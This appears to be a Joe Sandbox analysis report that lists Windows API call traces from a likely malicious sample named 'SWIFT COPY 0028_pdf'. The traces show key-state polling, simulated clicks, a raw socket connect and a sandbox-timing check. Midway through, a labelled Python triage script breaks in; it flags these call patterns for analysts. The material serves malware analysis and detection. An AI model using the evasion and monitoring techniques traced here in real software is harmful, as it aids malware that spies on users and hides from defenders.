• Instruction ID: af0f46fd1405ef58c498a842c26dd9837df734dabab1c351713fdf93fa239489
• Opcode Fuzzy Hash: 8cd4b3f75a273e4f1e11940769cf20f1049971553a213b1f26f1ddc6e8b6a559
• Instruction Fuzzy Hash: E441B4B9905214AFC720FB68CC44FA9BFACEB09310F140565F95AA73E1C734AD41DBA0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009712B4
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009712DD
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0097131C
  • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
  • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00971341
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00971349
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
• Opcode ID: 240d20ee0bd637b59cbe01c3ced2265f43b50a65eab46ea348c131b83690fb7e
• Instruction ID: 4f7e01c4c31970469b3fbf555c85be7752bd69403785349e24a02d29a425430c
• Opcode Fuzzy Hash: 240d20ee0bd637b59cbe01c3ced2265f43b50a65eab46ea348c131b83690fb7e
• Instruction Fuzzy Hash: E6410935A00215DFDF05EF64C981AAEBBF9FF49310B148099E91AAB366CB31ED01DB54
APIs
• GetCursorPos.USER32(000000FF), ref: 0093B64F
• ScreenToClient.USER32(00000000,000000FF), ref: 0093B66C
• GetAsyncKeyState.USER32(00000001), ref: 0093B691
• GetAsyncKeyState.USER32(00000002), ref: 0093B69F
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
• Opcode ID: a9720c1fb92fa9190c211ca106e57ffb52c4b58862a225a6a756a8e9b8ee20e9
• Instruction ID: 0485aba7c50af99c8490c77d779f79c2ecb1f5f1528dacce30281eac90cbeb1a
• Opcode Fuzzy Hash: a9720c1fb92fa9190c211ca106e57ffb52c4b58862a225a6a756a8e9b8ee20e9
• Instruction Fuzzy Hash: 17418E35608109FBDF159F68C885AEDBBB8FF05324F104319F82A92291CB34AD90DFA1
APIs
• GetWindowRect.USER32(?,?), ref: 0095B369
• PostMessageW.USER32(?,00000201,00000001), ref: 0095B413
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0095B41B
• PostMessageW.USER32(?,00000202,00000000), ref: 0095B429
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0095B431
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
• Opcode ID: fc4a2f6e8bec5cf323ed67d14a4d20db8b6e6007d49f184a18f2aad06d3eee84
• Instruction ID: 45e3c3a04d40dec0e2325708b0b2e430141d25f7459147ac755bf8efb9761f7c
• Opcode Fuzzy Hash: fc4a2f6e8bec5cf323ed67d14a4d20db8b6e6007d49f184a18f2aad06d3eee84
• Instruction Fuzzy Hash: DA31CC71905219EBDF14CFA9DD4DADE3BB9EF0531AF108229F921AA1D1C3B09918DB90
APIs
• IsWindowVisible.USER32(?), ref: 0095DBD7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0095DBF4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0095DC2C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0095DC52
• _wcsstr.LIBCMT ref: 0095DC5C
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
• Opcode ID: fa05036b62b7805dbf1212564aa4ab1b94445b39b94876400a82ae256ee979ad
• Instruction ID: 86e83cc3c3a1a8e46f82f2cd54a365acf57ae01741d48d45365d54235c45f4da
• Opcode Fuzzy Hash: fa05036b62b7805dbf1212564aa4ab1b94445b39b94876400a82ae256ee979ad
• Instruction Fuzzy Hash: 9E21F272209204ABEB259F2ADC49E7B7BACDF85751F104029FC0ACA191EAA5C84597A0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0095BC90
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0095BCC2
• __itow.LIBCMT ref: 0095BCDA
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0095BD00
• __itow.LIBCMT ref: 0095BD11
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
• API String ID: 3379773720-0
• Opcode ID: dd3760abb3f286c74b9c60438c99c1aad184df41a227409450d6281326c2ae1c
• Instruction ID: da91d1666726a16328a05204e8f6a65e3e2f814730ff5aed3b22a00b4528bf16
• Opcode Fuzzy Hash: dd3760abb3f286c74b9c60438c99c1aad184df41a227409450d6281326c2ae1c
• Instruction Fuzzy Hash: 6E21C6756002187ADB10EF6A9C46FDE7A7CAF8A711F000025FD46EB1C1EBB0894987E1
APIs
  • Part of subcall function 009250E6: _wcsncpy.LIBCMT ref: 009250FA
• GetFileAttributesW.KERNEL32(?,?,?,?,009660C3), ref: 00966369
• GetLastError.KERNEL32(?,?,?,009660C3), ref: 00966374
• CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009660C3), ref: 00966388
• _wcsrchr.LIBCMT ref: 009663AA
  • Part of subcall function 00966318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009660C3), ref: 009663E0
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
• Opcode ID: 8550d3ffa756a3ee27ee3ac06ea26d879c9b7c7e68460bd959684c717ec0088f
• Instruction ID: 32b145a7a15d9ac382b29458c89ad2d2d72b11355fb4abc23c7a3a09ca81e2d1
• Opcode Fuzzy Hash: 8550d3ffa756a3ee27ee3ac06ea26d879c9b7c7e68460bd959684c717ec0088f
• Instruction Fuzzy Hash: 0E213A319192159BDF15AB78AC52FFA33ACEF46360F100466F046D72C0EF70DD809A95
APIs
  • Part of subcall function 0097A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0097A84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00978BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00978BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00978BFE
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• String ID:
• API String ID: 3701255441-0
• Opcode ID: b481d830891762a3d494759c1f56f72114719b11895cafed966b1a15617776c9
• Instruction ID: 608d194cbfa7cb5d700bfa61a49d507f37b4bf801019c785f5bf5e5e9b4bd15f
• Opcode Fuzzy Hash: b481d830891762a3d494759c1f56f72114719b11895cafed966b1a15617776c9
• Instruction Fuzzy Hash: B82190722402149FCB14AF68CC89B7E77ADAF89710F048459F956AB2D2CF74AC018BA1
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00978441
                                                                                    • GetForegroundWindow.USER32 ref: 00978458
                                                                                    • GetDC.USER32(00000000), ref: 00978494
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 009784A0
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 009784DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: cc25e7bc9b97a13a6c83e973433e8c9d7f2ef337655416395adef603c5fee0ec
                                                                                    • Instruction ID: 2d0a79d0952ef69d8fd110efa44c8f3a30b412ec43fac434e6bddd3f6e8dec96
                                                                                    • Opcode Fuzzy Hash: cc25e7bc9b97a13a6c83e973433e8c9d7f2ef337655416395adef603c5fee0ec
                                                                                    • Instruction Fuzzy Hash: 12218176A01204AFD704DFA4D889AAEBBE5EF89301F04C479F85AD7651DB70AD40DBA0
                                                                                    APIs
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0093AFE3
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0093AFF2
                                                                                    • BeginPath.GDI32(?), ref: 0093B009
                                                                                    • SelectObject.GDI32(?,00000000), ref: 0093B033
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    • String ID:
                                                                                    • API String ID: 3225163088-0
                                                                                    • Opcode ID: 8bbecdcbe506175bb86d61a4f8b12e62f7f9636566c4b0f0d4e961213b4ccd44
                                                                                    • Instruction ID: 95089b2a2dcdb924684354cd80ee38a8ab056dceb6eefbc80faeb3d5674a6283
                                                                                    • Opcode Fuzzy Hash: 8bbecdcbe506175bb86d61a4f8b12e62f7f9636566c4b0f0d4e961213b4ccd44
                                                                                    • Instruction Fuzzy Hash: 5521D4B0828385EFDB14DF54EC8879E7B6CBB11755F14431AF5259A1A0C3705D81EF91
                                                                                    APIs
                                                                                    • __calloc_crt.LIBCMT ref: 009421A9
                                                                                    • CreateThread.KERNEL32(?,?,009422DF,00000000,?,?), ref: 009421ED
                                                                                    • GetLastError.KERNEL32 ref: 009421F7
                                                                                    • _free.LIBCMT ref: 00942200
                                                                                    • __dosmaperr.LIBCMT ref: 0094220B
                                                                                      • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                    • String ID:
                                                                                    • API String ID: 2664167353-0
                                                                                    • Opcode ID: 2d267c2525234a19a659cc6d1b0d1a86d95d64cf8d856d9c8078df071e2edb2b
                                                                                    • Instruction ID: 79180475661100c8365494ec96bad1c6b6e79980247415cffa601c59f7e88533
                                                                                    • Opcode Fuzzy Hash: 2d267c2525234a19a659cc6d1b0d1a86d95d64cf8d856d9c8078df071e2edb2b
                                                                                    • Instruction Fuzzy Hash: 3411043210834AAF9F15AFA4DC41EAB7B99FF85774B100429F92486181EBB1D81186A1
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0095ABD7
                                                                                    • GetLastError.KERNEL32(?,0095A69F,?,?,?), ref: 0095ABE1
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,0095A69F,?,?,?), ref: 0095ABF0
                                                                                    • HeapAlloc.KERNEL32(00000000,?,0095A69F,?,?,?), ref: 0095ABF7
                                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0095AC0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: 4126678505524ccca276057de372bfb40507ff0d79a10e17fac37ed6423eccff
                                                                                    • Instruction ID: 9b97e5f3c2f494853c1d0880667a2379f3c34799f0cb2f5979ffa5d07cadb2a8
                                                                                    • Opcode Fuzzy Hash: 4126678505524ccca276057de372bfb40507ff0d79a10e17fac37ed6423eccff
                                                                                    • Instruction Fuzzy Hash: 99018C70215204BFDB108FAADC48DAB3BACEF8A355B100529F846C3260DA71CC44DBA4
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32 ref: 00959ADC
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 00959AF7
                                                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 00959B05
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00959B15
                                                                                    • CLSIDFromString.OLE32(?,?), ref: 00959B21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: a412cc6d30634cd6edbee3c538251b7154c968e87fd862b2d3a2e87c87ecfd1e
                                                                                    • Instruction ID: 5e8ad747efc6c692bd6bcf82359b054225db39960b6985397e754948b1b65635
                                                                                    • Opcode Fuzzy Hash: a412cc6d30634cd6edbee3c538251b7154c968e87fd862b2d3a2e87c87ecfd1e
                                                                                    • Instruction Fuzzy Hash: BB017876611208FFEB108F69EC44AAABBADEF45792F148024FD06D2210D774DD48ABA0
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967A74
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00967A82
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00967A8A
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00967A94
                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: 7666e4912c4b81219473068960d006719d2179b85fda414c4bd47efe4e1b1c6d
                                                                                    • Instruction ID: 606e48e16cdfc6b7e374e8f0b24182dccb4b337de453ebc7bad59793c3b44c45
                                                                                    • Opcode Fuzzy Hash: 7666e4912c4b81219473068960d006719d2179b85fda414c4bd47efe4e1b1c6d
                                                                                    • Instruction Fuzzy Hash: E3012531C1A629EBDF04AFE4EC48AEDFB78FF09715F000456E902B2260DB3496509BA1
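As an added example (not part of the Joe Sandbox report or of the analysed sample), the following Python script turns per-function "APIs" listings of the form shown above into call sequences and flags a few sequences a triager wants to see first: the QueryPerformanceCounter/Sleep timing routine at 00967A74, the TokenIntegrityLevel query at 0095AADA and the socket/connect routine at 00978BD3. The pattern table is this example's own heuristic, and SAMPLE_LISTING is a constructed subset copied from the entries on this page.

```python
"""Added example: a triage helper for Joe Sandbox "APIs" listings.

Not part of the report or of the analysed sample. It parses the per-function
API call lines of the form shown above into call sequences and flags a few
call patterns worth a closer look. The pattern table is this example's own
heuristic; SAMPLE_LISTING is a subset copied from the entries on this page.
"""
import re

# Constructed input: four function records in the report's own format.
SAMPLE_LISTING = """\
APIs
 • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967A74
 • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00967A82
 • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00967A8A
 • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00967A94
 • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
Memory Dump Source
 • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
APIs
 • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0095AADA
 • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAE4
 • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAF3
 • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAFA
 • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AB10
APIs
 • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00978BD3
 • WSAGetLastError.WSOCK32(00000000), ref: 00978BE2
 • connect.WSOCK32(00000000,?,00000010), ref: 00978BFE
APIs
 • __calloc_crt.LIBCMT ref: 009421A9
 • CreateThread.KERNEL32(?,?,009422DF,00000000,?,?), ref: 009421ED
 • GetLastError.KERNEL32 ref: 009421F7
 • _free.LIBCMT ref: 00942200
 • __dosmaperr.LIBCMT ref: 0094220B
   • Part of subcall function 00947C0E: __getptd_noexit.LIBCMT ref: 00947C0E
"""

# One API call line: "• Name.MODULE(args), ref: ADDR". The argument list and
# the "Part of subcall function ...:" prefix are both optional.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_functions(listing):
    """Split a listing into function records.

    Each record is {"entry": ref of the first call, "calls": [(api, module,
    args, ref), ...]}. A new record starts at every bare "APIs" line; lines
    from other sections ("Memory Dump Source", "Similarity", ...) do not
    match API_LINE and are ignored.
    """
    functions = []
    current = None
    for raw in listing.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = {"entry": None, "calls": []}
            functions.append(current)
            continue
        m = API_LINE.search(line)
        if m is None or current is None:
            continue
        call = (m["api"], m["module"], m["args"] or "", m["ref"].upper())
        current["calls"].append(call)
        if current["entry"] is None:
            current["entry"] = call[3]
    return [f for f in functions if f["calls"]]


# Heuristic patterns (this example's assumption, not report output).
def _timing_check(calls):
    # Two counter reads around a Sleep: measures elapsed time, a common
    # debugger/sandbox timing check.
    names = [c[0] for c in calls]
    return names.count("QueryPerformanceCounter") >= 2 and "Sleep" in names


def _integrity_level_query(calls):
    return any(c[0] == "GetTokenInformation" and "TokenIntegrityLevel" in c[2]
               for c in calls)


def _tcp_connect(calls):
    return {"socket", "connect"} <= {c[0] for c in calls}


PATTERNS = [
    ("timing check: QueryPerformanceCounter around Sleep", _timing_check),
    ("token integrity-level query", _integrity_level_query),
    ("raw TCP connect via socket/connect", _tcp_connect),
]


def flag_functions(listing):
    """Return [(entry_ref, [pattern names...]), ...] for records that match."""
    flagged = []
    for fn in parse_functions(listing):
        hits = [name for name, pred in PATTERNS if pred(fn["calls"])]
        if hits:
            flagged.append((fn["entry"], hits))
    return flagged


if __name__ == "__main__":
    for entry, hits in flag_functions(SAMPLE_LISTING):
        print(entry, "->", "; ".join(hits))
```

Records are keyed by the ref of their first call, which is the address Joe Sandbox lists first and so the easiest thing to jump to in the dump. The patterns are deliberately loose set or count tests on API names; tighten them (ordering, argument values) once you know which evasions matter for the family you are looking at.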
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0095AADA
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAE4
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAF3
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AAFA
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0095AB10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
